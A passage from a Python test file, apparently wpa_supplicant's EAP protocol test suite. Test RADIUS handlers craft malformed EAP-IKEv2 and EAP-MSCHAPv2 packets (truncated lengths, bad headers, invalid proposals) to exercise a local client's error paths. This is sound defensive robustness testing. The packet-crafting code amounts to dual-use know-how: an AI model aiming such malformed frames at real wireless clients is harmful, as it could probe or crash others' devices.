eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
def test_eap_proto_ikev2(dev, apdev):
"""EAP-IKEv2 protocol tests"""
check_eap_capa(dev[0], "IKEV2")
def ikev2_handler(ctx, req):
logger.info("ikev2_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_IKEV2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated Message Length field")
return struct.pack(">BBHBB3B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3,
EAP_TYPE_IKEV2, 0x80, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short Message Length value")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_IKEV2, 0x80, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0x80, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message(2)")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0x80, 0xffffffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message(3)")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0xc0, 0xffffffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message(4)")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0xc0, 10000000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragments (first fragment)")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_IKEV2, 0xc0, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragments (second fragment)")
return struct.pack(">BBHBB2B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_IKEV2, 0x00, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No Message Length field in first fragment")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_IKEV2, 0x40, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: ICV before keys")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_IKEV2, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported IKEv2 header version")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Incorrect IKEv2 header Length")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Exchange Type in SA_INIT state")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 0, 0, 0, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Message ID in SA_INIT state")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0, 1, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Flags value")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0, 0, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Flags value(2)")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0x20, 0, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No SAi1 in SA_INIT")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0x08, 0, 28)
def build_ike(id, next=0, exch_type=34, flags=0x00, ike=''):
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, id,
4 + 1 + 1 + 28 + len(ike),
EAP_TYPE_IKEV2, flags,
0, 0, 0, 0,
next, 0x20, exch_type, 0x08, 0,
28 + len(ike)) + ike
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected extra data after payloads")
return build_ike(ctx['id'], ike=struct.pack(">B", 1))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated payload header")
return build_ike(ctx['id'], next=128, ike=struct.pack(">B", 1))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too small payload header length")
ike = struct.pack(">BBH", 0, 0, 3)
return build_ike(ctx['id'], next=128, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large payload header length")
ike = struct.pack(">BBH", 0, 0, 5)
return build_ike(ctx['id'], next=128, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported payload (non-critical and critical)")
ike = struct.pack(">BBHBBH", 129, 0, 4, 0, 0x01, 4)
return build_ike(ctx['id'], next=128, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Certificate and empty SAi1")
ike = struct.pack(">BBHBBH", 33, 0, 4, 0, 0, 4)
return build_ike(ctx['id'], next=37, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short proposal")
ike = struct.pack(">BBHBBHBBB", 0, 0, 4 + 7,
0, 0, 7, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too small proposal length in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 7, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large proposal length in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 9, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected proposal type in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
1, 0, 8, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Protocol ID in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected proposal number in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 0, 1, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Not enough room for SPI in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 1, 1, 1, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected SPI in SAi1")
ike = struct.pack(">BBHBBHBBBBB", 0, 0, 4 + 9,
0, 0, 9, 1, 1, 1, 0, 1)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No transforms in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 1, 1, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short transform in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 1, 1, 0, 1)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too small transform length in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
0, 0, 7, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large transform length in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
0, 0, 9, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Transform type in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
1, 0, 8, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No transform attributes in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
0, 0, 8, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No transform attr for AES and unexpected data after transforms in SAi1")
tlen1 = 8 + 3
tlen2 = 8 + 4
tlen3 = 8 + 4
tlen = tlen1 + tlen2 + tlen3
ike = struct.pack(">BBHBBHBBBBBBHBBH3BBBHBBHHHBBHBBHHHB",
0, 0, 4 + 8 + tlen + 1,
0, 0, 8 + tlen + 1, 1, 1, 0, 3,
3, 0, tlen1, 1, 0, 12, 1, 2, 3,
3, 0, tlen2, 1, 0, 12, 0, 128,
0, 0, tlen3, 1, 0, 12, 0x8000 | 14, 127,
1)
return build_ike(ctx['id'], next=33, ike=ike)
def build_sa(next=0):
tlen = 5 * 8
return struct.pack(">BBHBBHBBBBBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
next, 0, 4 + 8 + tlen,
0, 0, 8 + tlen, 1, 1, 0, 5,
3, 0, 8, 1, 0, 3,
3, 0, 8, 2, 0, 1,
3, 0, 8, 3, 0, 1,
3, 0, 8, 4, 0, 5,
0, 0, 8, 241, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, but no KEi in SAi1")
ike = build_sa()
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Empty KEi in SAi1")
ike = build_sa(next=34) + struct.pack(">BBH", 0, 0, 4)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Mismatch in DH Group in SAi1")
ike = build_sa(next=34)
ike += struct.pack(">BBHHH", 0, 0, 4 + 4 + 96, 12345, 0)
ike += 96*'\x00'
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid DH public value length in SAi1")
ike = build_sa(next=34)
ike += struct.pack(">BBHHH", 0, 0, 4 + 4 + 96, 5, 0)
ike += 96*'\x00'
return build_ike(ctx['id'], next=33, ike=ike)
def build_ke(next=0):
ke = struct.pack(">BBHHH", next, 0, 4 + 4 + 192, 5, 0)
ke += 192*'\x00'
return ke
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal and KEi, but no Ni in SAi1")
ike = build_sa(next=34)
ike += build_ke()
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short Ni in SAi1")
ike = build_sa(next=34)
ike += build_ke(next=40)
ike += struct.pack(">BBH", 0, 0, 4)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long Ni in SAi1")
ike = build_sa(next=34)
ike += build_ke(next=40)
ike += struct.pack(">BBH", 0, 0, 4 + 257) + 257*'\x00'
return build_ike(ctx['id'], next=33, ike=ike)
def build_ni(next=0):
return struct.pack(">BBH", next, 0, 4 + 256) + 256*'\x00'
def build_sai1(id):
ike = build_sa(next=34)
ike += build_ke(next=40)
ike += build_ni()
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: No integrity checksum")
ike = ''
return build_ike(ctx['id'], next=37, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated integrity checksum")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_IKEV2, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid integrity checksum")
ike = ''
return build_ike(ctx['id'], next=37, flags=0x20, ike=ike)
return None
srv = start_radius_server(ikev2_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(49):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="user",
password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 40, 45 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def NtPasswordHash(password):
pw = password.encode('utf_16_le')
return hashlib.new('md4', pw).digest()
def HashNtPasswordHash(password_hash):
return hashlib.new('md4', password_hash).digest()
def ChallengeHash(peer_challenge, auth_challenge, username):
data = peer_challenge + auth_challenge + username
return hashlib.sha1(data).digest()[0:8]
def GenerateAuthenticatorResponse(password, nt_response, peer_challenge,
auth_challenge, username):
magic1 = binascii.unhexlify("4D616769632073657276657220746F20636C69656E74207369676E696E6720636F6E7374616E74")
magic2 = binascii.unhexlify("50616420746F206D616B6520697420646F206D6F7265207468616E206F6E6520697465726174696F6E")
password_hash = NtPasswordHash(password)
password_hash_hash = HashNtPasswordHash(password_hash)
data = password_hash_hash + nt_response + magic1
digest = hashlib.sha1(data).digest()
challenge = ChallengeHash(peer_challenge, auth_challenge, username)
data = digest + challenge + magic2
resp = hashlib.sha1(data).digest()
return resp
def test_eap_proto_mschapv2(dev, apdev):
"""EAP-MSCHAPv2 protocol tests"""
check_eap_capa(dev[0], "MSCHAPV2")
def mschapv2_handler(ctx, req):
logger.info("mschapv2_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_MSCHAPV2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown MSCHAPv2 op_code")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
0, 0, 5, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ms_len and unknown MSCHAPv2 op_code")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
255, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success before challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
3, 0, 5, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - required challenge field not present")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
4, 0, 5, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - invalid failure challenge len")
payload = 'C=12'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - invalid failure challenge len")
payload = 'C=12 V=3'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - invalid failure challenge")
payload = 'C=00112233445566778899aabbccddeefQ '
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
payload = "S=1122334455667788990011223344556677889900"
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid challenge length")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short challenge packet")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1, 16)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
if len(req) != 591:
logger.info("Unexpected Change-Password packet length: %s" % len(req))
return None
data = req[9:]
enc_pw = data[0:516]
data = data[516:]
enc_hash = data[0:16]
data = data[16:]
peer_challenge = data[0:16]
data = data[16:]
# Reserved
data = data[8:]
nt_response = data[0:24]
data = data[24:]
flags = data
logger.info("enc_hash: " + enc_hash.encode("hex"))
logger.info("peer_challenge: " + peer_challenge.encode("hex"))
logger.info("nt_response: " + nt_response.encode("hex"))
logger.info("flags: " + flags.encode("hex"))
auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
logger.info("auth_challenge: " + auth_challenge.encode("hex"))
auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
peer_challenge,
auth_challenge, "user")
payload = "S=" + auth_resp.encode('hex').upper()
logger.info("Success message payload: " + payload)
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
if len(req) != 591:
logger.info("Unexpected Change-Password packet length: %s" % len(req))
return None
data = req[9:]
enc_pw = data[0:516]
data = data[516:]
enc_hash = data[0:16]
data = data[16:]
peer_challenge = data[0:16]
data = data[16:]
# Reserved
data = data[8:]
nt_response = data[0:24]
data = data[24:]
flags = data
logger.info("enc_hash: " + enc_hash.encode("hex"))
logger.info("peer_challenge: " + peer_challenge.encode("hex"))
logger.info("nt_response: " + nt_response.encode("hex"))
logger.info("flags: " + flags.encode("hex"))
auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
logger.info("auth_challenge: " + auth_challenge.encode("hex"))
auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
peer_challenge,
auth_challenge, "user")
payload = "S=" + auth_resp.encode('hex').upper()
logger.info("Success message payload: " + payload)
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - authentication failure")
payload = 'E=691 R=1 C=00112233445566778899aabbccddeeff V=3 M=Authentication failed'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - authentication failure")
payload = 'E=691 R=1 C=00112233445566778899aabbccddeeff V=3 M=Authentication failed (2)'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(mschapv2_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 15):
logger.info("RUN: %d" % i)
if i == 12:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
elif i == 14:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
phase2="mschapv2_retry=0",
password="password", wait_connect=False)
else:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 8, 11, 12 ]:
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"],
timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
if i in [ 11, 12 ]:
ev = dev[0].wait_event(["CTRL-EVENT-PASSWORD-CHANGED"],
timeout=10)
if ev is None:
raise Exception("Timeout on password change")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP success")
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
if i in [ 13 ]:
ev = dev[0].wait_event(["CTRL-REQ-IDENTITY"],
timeout=10)
if ev is None:
raise Exception("Timeout on identity request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-IDENTITY-" + id + ":user")
ev = dev[0].wait_event(["CTRL-REQ-PASSWORD"],
timeout=10)
if ev is None:
raise Exception("Timeout on password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-PASSWORD-" + id + ":password")
# TODO: Does this work correctly?
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
if i in [ 4, 5, 6, 7, 14 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
finally:
stop_radius_server(srv)
def test_eap_proto_mschapv2_errors(dev, apdev):
"""EAP-MSCHAPv2 protocol tests (error paths)"""
check_eap_capa(dev[0], "MSCHAPV2")
def mschapv2_handler(ctx, req):
logger.info("mschapv2_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
payload = "S=1122334455667788990011223344556677889900"
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
payload = "S=1122334455667788990011223344556677889900"
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
return None
srv = start_radius_server(mschapv2_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
with fail_test(dev[0], 1, "eap_mschapv2_change_password"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
